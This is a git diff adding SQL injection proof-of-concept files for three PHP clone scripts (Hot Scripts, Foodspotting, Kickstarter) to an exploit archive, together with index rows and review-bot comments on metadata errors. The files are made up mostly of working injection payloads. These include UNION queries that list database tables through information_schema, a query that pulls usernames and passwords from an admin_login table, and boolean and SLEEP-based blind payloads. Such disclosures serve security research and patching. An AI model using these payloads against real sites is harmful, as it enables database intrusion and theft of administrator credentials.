# \ No newline at end of file diff --git a/exploits/php/webapps/43284.txt b/exploits/php/webapps/43284.txt new file mode 100644 index 000000000..3df296eb5 --- /dev/null +++ b/exploits/php/webapps/43284.txt 
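Review bot: The two `pr_id` results in 43283.txt disagree on the width of the result set: the hand-written UNION lists 100 columns, while the tool output below it is titled `Generic UNION query (NULL) - 83 columns`. Both target `jobdetails.php?pr_id`, so at most one can match a given build, which suggests they were taken from different installs or versions. The header should state which build each result came from, or the stale one should be dropped, so that someone verifying their own 2.0.6 install knows what to expect. The `catid` entry (88 columns, `searchbycat_list.php`) is a different query and is not affected.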
@@ -0,0 +1,35 @@ +# # # # # +# Exploit Title: Hot Scripts Clone 3.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/ +# Version: 3.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/categories?subctid=[SQL] +# +# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+- +# +# 2) +# http://localhost/[PATH]/categories?&mctid=[SQL] +# +# -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43285.txt b/exploits/php/webapps/43285.txt new file mode 100644 index 000000000..81ce471f4 --- /dev/null +++ b/exploits/php/webapps/43285.txt 
@@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Foodspotting Clone Script 1.0 - 'q' SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/foodspotting-clone/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/quicksearch.php?q=[SQL] +# +# -1'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+- +# +# -1'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(a_id,0x3a,username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+admin_login),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+- +# +# http://server/quicksearch.php?q=-1'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+- +# +# Parameter: q (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: q=1%' AND 5971=5971 AND '%'=' +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: q=1%' AND SLEEP(5) AND '%'=' +# +# Type: UNION query +# 
Title: Generic UNION query (NULL) - 31 columns +# Payload: q=1%' UNION ALL SELECT NULL,CONCAT(0x7178766271,0x4f465861726a486c444f775973474c61656c6143724e785a4c476a50464550547357426e6a56416d,0x7170707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DGFC +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43286.txt b/exploits/php/webapps/43286.txt new file mode 100644 index 000000000..f4d5658f3 --- /dev/null +++ b/exploits/php/webapps/43286.txt @@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: Kickstarter Clone Acript 2.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/kickstarter-clone-script/ +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/investcalc.php?price=1&projid=[SQL] +# +# +# # # # # \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8c62511ec..216730a57 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
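Review bot: 43285.txt describes the issue only as `allows an attacker to inject sql commands....`, but its second entry reads `a_id`, `username` and `password` from `admin_login`, so the demonstrated impact is disclosure of administrator credentials. The Description should say that, e.g. `# Impact: read access to admin_login (admin usernames and passwords) via quicksearch.php?q`. This changes the response for an affected site: fixing the query is not enough, and admin passwords need to be rotated. Whether the stored passwords are hashed is not shown in the file.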
@@ -38300,3 +38300,21 @@ id,file,description,date,author,type,platform,port
 43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
 43266,exploits/php/webapps/43266.txt,"Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43268,exploits/php/webapps/43268.txt,"Nearbuy Clone Script 3.2 - 'search' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43269,exploits/php/webapps/43269.txt,"Cab Booking Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43270,exploits/php/webapps/43270.txt,"Chartered Accountant Booking Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43271,exploits/php/webapps/43271.txt,"Child Care Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43272,exploits/php/webapps/43272.txt,"CMS Auditor Website 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43273,exploits/php/webapps/43273.txt,"Co-work Space Search Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43282,exploits/php/webapps/43282.txt,"Yoga Class Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43274,exploits/php/webapps/43274.txt,"Consumer Complaints Clone Script 1.0 - 'id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43275,exploits/php/webapps/43275.txt,"Entrepreneur Job Portal Script 2.0.6 - 'jobsearch_all.php?rid1' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43276,exploits/php/webapps/43276.txt,"Doctor Search Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43281,exploits/php/webapps/43281.txt,"Food Order Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43277,exploits/php/webapps/43277.txt,"E-commerce MLM Software 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43280,exploits/php/webapps/43280.txt,"Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
+43283,exploits/php/webapps/43283.txt,"Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43284,exploits/php/webapps/43284.txt,"Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43285,exploits/php/webapps/43285.txt,"Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
+43286,exploits/php/webapps/43286.txt,"Kickstarter Clone Acript 2.0 - 'projid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
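Review bot: Eleven of the added rows (43268–43277 and 43279) leave the last field, `port`, empty and end in `,webapps,php,`, while the three context rows and the other seven added rows all carry `80`. A consumer that parses `port` as an integer will hit an empty string on these rows; they should end in `,80` like their neighbours unless the blank is deliberate. The rows are also out of id order (43282 sits between 43273 and 43274, 43281 between 43276 and 43277) and id 43278 is absent, which is worth confirming as intended. The description for 43286 carries the `Acript` spelling from the file title, where the product link suggests `Script`.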